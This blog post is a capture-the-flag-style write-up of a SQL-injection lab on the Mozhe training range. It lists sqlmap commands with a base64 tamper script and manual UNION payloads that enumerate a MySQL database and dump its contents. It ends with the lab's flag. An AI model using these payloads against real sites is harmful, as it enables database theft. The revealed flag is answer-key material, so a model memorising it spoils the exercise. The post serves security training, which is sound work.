美文网首页
web训练sql注入中级练习-墨者学堂

web训练sql注入中级练习-墨者学堂

作者: 白先生_bfb1 | 来源:发表于2018-10-30 18:11 被阅读22次

    sql注入实战mysql(进阶版)

    看这个是base64编码

    手工注入注入不出来。。。

    使用sqlmap跑提示使用tamper插件(里面有一个base64encode.py)

    python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py  --risk 3 --dbms=mysql

    暴库

    python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py  --risk 3 --dbms=mysql --dbs

    出来两个库(information_schema 和 test)

    暴表

    python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py  --risk 3 --dbms=mysql --tables -D test

    爆出data

    暴列

    python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py  --risk 3 --dbms=mysql --colunmns -T data -D test

    爆出 id  main thekey

    暴字段

    python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py  --risk 3 --dbms=mysql --dump -C "id,main,thekey" -T data -D test

    得出key

    手工注入

    MQo= 是1的base64编码

    以下执行的时候都要base64编码,用火狐的hackbar

    猜长度

    http://219.153.49.228:46170/show.php?id=1 order 2

    回显正常 说明长度为2

    猜库名

    http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,database()

    猜出库名为test

    猜表名

    http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='test'

    猜出表名为 data

    猜列

    http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()

    猜出有 id,title,main,thekey

    猜字段

    http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,group_concat(id,'-',thekey) from data

    得出key 1-mozhe1f0328cc6f2a60605567e65e5cd

    相关文章

      网友评论

          本文标题:web训练sql注入中级练习-墨者学堂

          本文链接:https://www.haomeiwen.com/subject/rvfntqtx.html